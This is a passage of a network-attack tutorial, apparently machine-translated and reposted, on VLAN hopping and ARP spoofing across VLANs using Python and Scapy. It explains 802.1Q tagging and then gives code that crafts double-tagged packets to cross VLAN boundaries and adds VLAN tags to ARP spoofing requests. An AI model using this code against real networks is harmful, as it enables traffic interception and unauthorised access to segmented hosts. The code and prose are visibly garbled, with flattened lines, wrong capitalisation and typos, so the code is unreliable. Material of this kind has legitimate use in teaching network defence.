Python Black Hat programming 3.4 spanning VLANs

VLAN (Virtual Local area Network), which is built on the basis of Ethernet interaction technology, can divide the same physical network into multiple valn, or cross the physical network barrier, and divide users from different subnets into the same VLAN. Figure 2 is an example of a VLAN partition.

Figure 2

There are many ways to implement VLANs, and there are generally two types of VLAN partitioning based on switching devices:

L Switch-based port partitioning

L Extended Ethernet frame format based on IEEE 802.1q protocol

Based on the second layer of VLAN technology, there is a trunking concept that trunking is used to connect between different switches to ensure that members of the same VLAN established across multiple switches can communicate with each other. The ports in which the switches are interconnected are called trunk ports. In addition to 80.2.1q, Cisco has its own trunk protocol called ISL.

Figure 3

Figure 3 is a 802.1q packet, and the normal Ethernet frame does not have the essential difference, just adds a VLAN Tag. The VLAN identifier of the red section identifies which VLAN a packet belongs to, guaranteeing that the range of data broadcasts does not span the VLAN.

Now do the simple thinking, want to cross the VLAN communication, is it just to modify the identifier in the packet?

3.4.1 VLAN Hopping

Based on the above analysis, we consider a simple scenario: cross-vlanping, sending a ping request from a host in Vlan1 to a host in Vlan2.

Before the specific coding, we have to solve the problem of VLAN packet construction, in Scapy we use the Dot1q class to construct the tag part of Figure 3. 4.

Figure 4

Below we can write a ping request that crosses a VLAN.

#!/usr/bin/python from scapy.all import * packet = ether (dst= "c0:d3:de:ad:be:ef")/\dot1q (vlan=1)/\dot1q (vlan=2)/\IP ( Dst= "192.168.13.3")/\icmp () SENDP (packet)

The code above specifies the target host's Mac and IP address, adds two VLAN identities, the first is the VLAN where the host is sending the data, and the second is the VLAN where the destination host resides. The switch removes the first identity, and when it reads the second identity, it forwards the packet to the target host.

3.4.2 ARP spoofing across VLANs

Sections 3.1, 3.2, and 3.3 We're all talking about ARP spoofing, because VLANs restrict broadcast domains, and our previous code doesn't have ARP spoofing across VLANs. But it's also easy to solve this problem by simply inserting the VLAN identifier into the ARP spoofing data we constructed earlier. The following code is the code in which we construct the ARP Request packet in section 3.1.

Def build_req (): If options.target is none:pkt = Ether (Src=mac, dst= ' ff:ff:ff:ff:ff:ff ')/ARP (Hwsrc=mac, psrc=args[0], PD St=args[0]) Elif Options.target:target_mac = Getmacbyip (options.target) If Target_mac is None:print "[-] Error:could not R Esolve targets MAC Address "sys.exit (1) pkt = ether (Src=mac, Dst=target_mac)/ARP (Hwsrc=mac, psrc=args[0], hwdst=target_ Mac, Pdst=options.target) return PKT

In the section that constructs the packet, we insert the VLAN identity:

PKT = Ether (Src=mac, Dst=target_mac)/dot1q (Vlan=our_vlan)/dot1q (Vlan=target_vlan)/ARP (Hwsrc=mac, Psrc=args[0], Hwdst=target_mac, Pdst=options.target)

This makes it possible to implement ARP spoofing across VLANs.

3.4.3 Summary

This section focuses on how to construct packets that spoof VLANs to achieve the purpose of cross-VLAN data communication and ARP spoofing. It is important to note that the method in this article is primarily for the 802.1Q protocol, and there is no effect on VLANs that are physically isolated on ports.

The above is a small series to introduce you to the Python Black Hat programming 3.4 cross-VLAN detailed, I hope we have some help, if you have any questions please give me a message, small series will promptly reply to you. Thank you very much for your support for topic.alibabacloud.com!